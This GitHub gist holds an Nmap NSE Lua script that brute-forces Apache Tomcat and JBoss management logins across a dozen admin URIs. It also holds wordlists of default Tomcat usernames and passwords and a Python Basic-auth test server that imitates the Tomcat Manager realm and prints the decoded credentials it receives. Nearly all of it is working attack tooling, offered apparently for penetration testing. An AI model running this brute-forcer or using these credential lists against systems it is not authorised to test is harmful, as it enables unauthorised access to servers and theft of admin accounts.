Last active
November 29, 2021 07:11
-
-
Save initbrain/493affe58d7dc08b498b to your computer and use it in GitHub Desktop.
Revisions
-
Julien Deudon revised this gist
Oct 29, 2015 . 2 changed files with 45 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,31 @@ 123123 123321 1234 12345 123456 12345678 1234578 admin ADMIN changeit changeme changethis j2deployer j5Brn9 kdsxc manager OvW*busr1 owaspbwa password password1 Password1 QLogic66 r00t role1 root s3cret secret tomcat toor xampp This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,14 @@ admin ADMIN admtomcatin both cxsdk j2deployer manager ovwebusr QCC role role1 root tomcat xampp -
Oct 29, 2015 . 1 changed file with 60 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,60 @@ import BaseHTTPServer from SimpleHTTPServer import SimpleHTTPRequestHandler import sys import base64 requestcounter = 0 key1 = "" key2 = "" class AuthHandler(SimpleHTTPRequestHandler): ''' Main class to present webpages and authentication. ''' def do_HEAD(self): self.send_response(200) self.send_header('Content-type', 'text/html') self.end_headers() def do_AUTHHEAD(self): self.send_response(401) self.send_header('WWW-Authenticate', 'Basic realm=\"Tomcat Manager Application\"') self.send_header('Content-type', 'text/html') self.end_headers() def do_GET(self): global key global requestcounter requestcounter+=1 print "-"*50 print "requestcounter="+str(requestcounter) print self.headers.getheader('User-agent') ''' Present frontpage with user authentication. ''' if self.headers.getheader('Authorization') == None: self.do_AUTHHEAD() self.wfile.write('no auth header received') print 'no auth header received' pass elif self.headers.getheader('Authorization') == 'Basic '+key1 \ or self.headers.getheader('Authorization') == 'Basic '+key2: SimpleHTTPRequestHandler.do_GET(self) print 'authenticated' print base64.b64decode(self.headers.getheader('Authorization')[6:]) pass else: self.do_AUTHHEAD() self.wfile.write(self.headers.getheader('Authorization')) self.wfile.write('not authenticated') print 'not authenticated' print base64.b64decode(self.headers.getheader('Authorization')[6:]) pass def test(HandlerClass = AuthHandler, ServerClass = BaseHTTPServer.HTTPServer): BaseHTTPServer.test(HandlerClass, ServerClass) if __name__ == '__main__': if len(sys.argv)<4: print "usage SimpleAuthServer.py [port] [username1:password1] [username2:password2]" sys.exit() key1 = base64.b64encode(sys.argv[2]) key2 = base64.b64encode(sys.argv[3]) test() -
Oct 29, 2015 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,127 @@ local shortport = require "shortport" local http = require "http" local stdnse = require "stdnse" local brute = require "brute" local creds = require "creds" description = [[ Performs a dictionary/bruteforce attack over login and password fields of Apache Tomcat default web management pages. ]] --- -- @usage -- ./nmap --script http-tomcat-manager --script-args 'brute.firstonly=false,threads=8,passdb=tomcat-passdb.txt,userdb=tomcat-userdb.txt' 192.168.1.23 -- -- @output -- PORT STATE SERVICE -- 631/tcp open ipp -- 8080/tcp open http-proxy -- | http-tomcat-manager: -- | Accounts: -- | admtomcatin:OvW*busr1 - URI=/manager/html STATUS=200 -- |_ root:toor - URI=/manager/html STATUS=200 -- -- -- @args hostname Sets hostname header. -- @args threads Sets number of concurrent threads. Default: 3 -- -- Other useful arguments when using this script are: -- * http.useragent = String - User Agent used in HTTP requests -- * brute.firstonly = Boolean - Stop attack when the first credentials are found -- * brute.mode = user/creds/pass - Username password iterator -- * passdb = String - Path to password list -- * userdb = String - Path to user list --- author = "Julien Deudon (initbrain)" license = "Same as Nmap--See http://nmap.org/book/man-legal.html" categories = {"default", "auth", "intrusive"} portrule = shortport.http local DEFAULT_THREAD_NUM = 3 --- --This class implements the Driver class from the Brute library --- Driver = { new = function(self, host, port, uri, options) local o = {} setmetatable(o, self) self.__index = self o.host = nmap.registry.args['hostname'] or host o.port = port o.uri = uri o.options = options return o end, connect = function( self ) return true end, login = function(self, username, password) local credentials = {username = username, password = password} local response = http.get(self.host, self.port, self.uri, {auth = credentials, no_cache = true}) stdnse.print_debug(2, "HTTP GET %s%s returned status %d", self.host, self.uri, response.status) if response.status ~= 401 and response.status ~= 403 and response.status ~= 404 then if (not( nmap.registry['credentials'])) then nmap.registry['credentials'] = {} end if (not( nmap.registry.credentials['http'])) then nmap.registry.credentials['http'] = {} end table.insert(nmap.registry.credentials.http, {username = username, password = password}) return true, creds.Account:new(username, password, "URI=" .. self.uri .. " STATUS=" .. response.status) end return false, brute.Error:new("Incorrect password") end, disconnect = function( self ) return true end, check = function( self ) local response = http.get(self.host, self.port, self.uri) stdnse.print_debug(1, "HTTP GET %s%s", stdnse.get_hostname(self.host),self.uri) -- Check if www-authenticate field is there if response.status == 401 and response.header["www-authenticate"] then stdnse.print_debug(1, "Initial check passed. Launching brute force attack") return true else stdnse.print_debug(1, "Initial check failed. www-authenticate header wasn't found") end return false end } --- --MAIN --- function table.removekey(table, key) local element = table[key] table[key] = nil return element end action = function(host, port) local status, engine, result local thread_num = nmap.registry["threads"] or DEFAULT_THREAD_NUM -- TODO get URIs form a file with the NSE script parameter "uridb" like "userdb" and "passdb" uriTable = {'/status', '/admin', '/web-console', '/jmx-console', '/admin-console', '/manager/html', '/tomcat/manager/html', '/host-manager/html', '/server-manager/html', '/web-console/Invoker', '/jmx-console/HtmlAdaptor', '/invoker/JMXInvokerServlet'} for i, uri in ipairs(uriTable) do local resultpart engine = brute.Engine:new(Driver, host, port, uri) engine:setMaxThreads(thread_num) engine.options.script_name = SCRIPT_NAME status, result = engine:start() end -- False statistics due to the URI iterator... if result ~= nil then table.removekey(result, "Statistics") end return result end
Julien Deudon
revised
this gist